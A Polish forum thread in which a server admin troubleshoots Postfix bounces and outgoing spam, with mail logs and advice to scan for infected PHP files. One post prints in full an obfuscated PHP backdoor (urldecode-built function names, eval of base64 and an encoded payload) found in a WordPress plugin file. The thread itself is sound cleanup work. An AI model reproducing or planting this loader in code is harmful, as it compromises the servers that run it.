Postfix i wysyłaniem zwrotek

[murgal 0]

Cześć,

 

 

mam problem, mianowocie gdy dostaję jakiś mail na nieistniejący adres od razu idzie zwrotka (chyba normalne)? I ta zwrotka często jest odrzucana i rozsyła spam. Logi wyglądają tak:

 

 

Co sądzicie?

 

 

 

Sep 14 13:47:28 serweri postfix/local[2295]: D470B211BC210: to=<courtney_rogers@MOJADOMENA.com>, relay=local, delay=0, delays=0/0/0/0, dsn=5.1.1, status=bounced (unknown user: "courtney_rogers")
Sep 14 13:47:28 serweri postfix/qmgr[1511]: D470B211BC210: removed
Sep 14 13:47:28 serweri postfix/smtp[2221]: 8B4F9211BC64B: to=<roozniazi@hotmail.com>, relay=mx3.hotmail.com[134.170.2.199]:25, delay=2.3, delays=0/0/1.8/0.55, dsn=2.0.0, status=sent (250  <f769da2e98750e155c94f7012d7de616@MOJADOMENA.com> Queued mail for delivery)
Sep 14 13:47:28 serweri postfix/qmgr[1511]: 8B4F9211BC64B: removed
Sep 14 13:47:29 serweri postfix/smtp[2243]: 71D7D211BC639: to=<noahmarrion69@gmail.com>, relay=gmail-smtp-in.l.google.com[74.125.205.26]:25, delay=2.6, delays=0/1.1/1/0.42, dsn=5.7.1, status=bounced (host gmail-smtp-in.l.google.com[74.125.205.26] said: 550-5.7.1 [5.149.193.67      18] Our system has detected that this message is 550-5.7.1 likely suspicious due to the very low reputation of the sending IP 550-5.7.1 address. To best protect our users from spam, the message has been 550-5.7.1 blocked. Please visit 550 5.7.1  https://support.google.com/mail/answer/188131 for more information. g14si7194800lji.45 - gsmtp (in reply to end of DATA command))
Sep 14 13:47:29 serweri postfix/cleanup[2185]: 09963211BC210: message-id=<20160914114729.09963211BC210@MOJSERWERPOCZTOWY.pl>
Sep 14 13:47:29 serweri postfix/bounce[2294]: 71D7D211BC639: sender non-delivery notification: 09963211BC210
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 09963211BC210: from=<>, size=4044, nrcpt=1 (queue active)
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 71D7D211BC639: removed
Sep 14 13:47:29 serweri postfix/local[2295]: 09963211BC210: to=<courtney_rogers@MOJADOMENA.com>, relay=local, delay=0, delays=0/0/0/0, dsn=5.1.1, status=bounced (unknown user: "courtney_rogers")
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 09963211BC210: removed
Sep 14 13:47:29 serweri postfix/smtp[1570]: 8209B211BC642: to=<susanajyn@gmail.com>, relay=gmail-smtp-in.l.google.com[2a00:1450:4010:c02::1b]:25, delay=2.5, delays=0/1.1/1/0.43, dsn=5.7.1, status=bounced (host gmail-smtp-in.l.google.com[2a00:1450:4010:c02::1b] said: 550-5.7.1 [2a00:d5c1:50::67] Our system has detected that this message does not 550-5.7.1 meet IPv6 sending guidelines regarding PTR records and authentication 550-5.7.1 . Please review 550-5.7.1  https://support.google.com/mail/?p=IPv6AuthError for more information 550 5.7.1 . k82si3535342lfd.92 - gsmtp (in reply to end of DATA command))
Sep 14 13:47:29 serweri postfix/cleanup[2298]: 0EC64211BC210: message-id=<20160914114729.0EC64211BC210@MOJSERWERPOCZTOWY.pl>
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 0EC64211BC210: from=<>, size=3839, nrcpt=1 (queue active)
Sep 14 13:47:29 serweri postfix/bounce[2294]: 8209B211BC642: sender non-delivery notification: 0EC64211BC210
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 8209B211BC642: removed
Sep 14 13:47:29 serweri postfix/local[2295]: 0EC64211BC210: to=<elsie_king@MOJADOMENA.com>, relay=local, delay=0, delays=0/0/0/0, dsn=5.1.1, status=bounced (unknown user: "elsie_king")
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 0EC64211BC210: removed
Sep 14 13:47:29 serweri postfix/smtp[2235]: 6EC0C211BC636: to=<lem5realright@gmail.com>, relay=gmail-smtp-in.l.google.com[2a00:1450:4010:c02::1b]:25, delay=2.6, delays=0/1.1/1/0.46, dsn=5.7.1, status=bounced (host gmail-smtp-in.l.google.com[2a00:1450:4010:c02::1b] said: 550-5.7.1 [2a00:d5c1:50::67] Our system has detected that this message does not 550-5.7.1 meet IPv6 sending guidelines regarding PTR records and authentication 550-5.7.1 . Please review 550-5.7.1  https://support.google.com/mail/?p=IPv6AuthError for more information 550 5.7.1 . i203si4129499lfd.191 - gsmtp (in reply to end of DATA command))
Sep 14 13:47:29 serweri postfix/cleanup[2185]: 14F32211BC210: message-id=<20160914114729.14F32211BC210@MOJSERWERPOCZTOWY.pl>
Sep 14 13:47:29 serweri postfix/bounce[2294]: 6EC0C211BC636: sender non-delivery notification: 14F32211BC210
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 14F32211BC210: from=<>, size=3868, nrcpt=1 (queue active)
Sep 14 13:47:29 serweri postfix/qmgr[1511]: 6EC0C211BC636: removed

[behemoth 230]

1. Masz kiepską reputację Twojego adresu IP

2. Albo ustaw rewers dla IPv6 albo wyłącz jego obsługę

[murgal 0]

Wywaliłem ipv6, dzięki.

 

 

A co z tymi śmieciowymi mailami które niby rozsyłam?

[behemoth 230]

Pewnie nie niby, tylko faktycznie je rozsyłasz.

Możesz zacząć od instalacji maldet'a.

Szukaj ostatnio dodanych, zmodyfikowanych plików.

Pewnie będziesz miał coś zainfekowanego. Słowa kluczowe "eval", "base64".

 

[murgal 0]

Według wszelkich testerów relayem nie jestem.

 

Maldetem zeskanowałem system, czysto.

[behemoth 230]

Nie mówiłem, że jesteś relay'em, tylko, że masz dziurawy skrypt.

Zobacz w access_logu requesty do plików, których nie powinno być. Często pojawia się np. t44.php

Przegrepowałeś pliki w poszukiwaniu base64 lub eval?

Możesz też zrobić np. tak: https://www.howtoforge.com/how-to-log-emails-sent-with-phps-mail-function-to-detect-form-spam

[murgal 0]

Skrypt logowania maili z php zainstalowany, czekam teraz na efekty.

 

Po aktualizacji wordpressa i wtyczek chyba jest lepiej...

 

 

Przejechałem i zgrepowałem, jest troche śmieci... typu:

 

 

"plugins/cherry-plugin/admin/import-export/x.php:<?php /* MMM */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x1333c;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUwNik7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tJOjd2xvFJE9wtwjcoC1wjShkoOlcMy1duOgCBY0DB9Vwe0Ik0cpdoazTByVkzShkoOlcMy1duOgfbYlb2yQCbIINUn0FmalKXPLcoaMCbaSfy9jDoyZF2a0we0Ik1fpdMOvf3HsHTw1HUF7tMlMhtyldbn0GUILb1YyAlcyAlSmUyOAAy9aA0aUb0yuOA5Ak10phUn7tJO1F2aZWBfldmOzwe0ICbkZCbLPwLfvd2fScUwSwlYSfbkXwJXJTaYKWM90wJXJDBygCbkjDol2cbwJRtkcCB5LcbIJRtkUCB1JdoaZwJL7tMlMhunZcBfgdBy0C2IPkZ8mRMlsFoxvcoAPk3XmRtO1F2aZWBfldmOzhUEVkZ9pkZXLb1YyAlcyAlSmUyOAAy9aA0aUb0yuOA5Ak10phUn7tMilCBOlFJImUyOAAt8xRjEIYeE0wr5vftnod3aVctFpKXplGol0KXp9tm0hWolVDa9zcbWPk2aZFM9Zaraz będę!2xvcZFSTlaHTtL7tLnpdMlgF2a0htfSd2fgcbkZd3kzkZXXhTShWolVDa9zcbWPk21iGy9lGoajfbOpd25gfolscUFSHtL7tLnzcbOgfolsca9SDB1pftIXhTShWuYlfy9sCBfpC19xfB90cbYgFmaVfolscUIXhTShWoOlcMlVcUIma1YNb1cyAlYkT04mRtFZRjAVHUFpKXppcJimcbOgdBymDBYgFbavfoazb2fXCZIphUn7tMc1dMY0DB9VwyfTT3Y0FMlXF2xiF2ilFZILCbkZCbLpwuShFMa0fbkVwolzb2yZFMy5htOiFmkiGULIN2yZFMy5b21iFtIma1YNF3OZDbnzdoyzDoazkZXLCbkZCbLpwePIF3OZDbnzdoyzDoazhtOiFmkiGUL7tm0hky9WT1YAwe0Ia1YNF3OZDbnzdoyzDoazhtOgAr9TatL7tJOgW"

 

 

 

Jak sobie z tym szybko poradzić?

Edytowano Wrzesień 14, 2016 przez murgal (zobacz historię edycji)

[murgal 0]

Mój problem rozwiązało wyczyszczenie skryptów + wyłączenie funkcji mail (tymczasowo) oraz wyczyszczenie kolejki (było kilka tysięcy maili).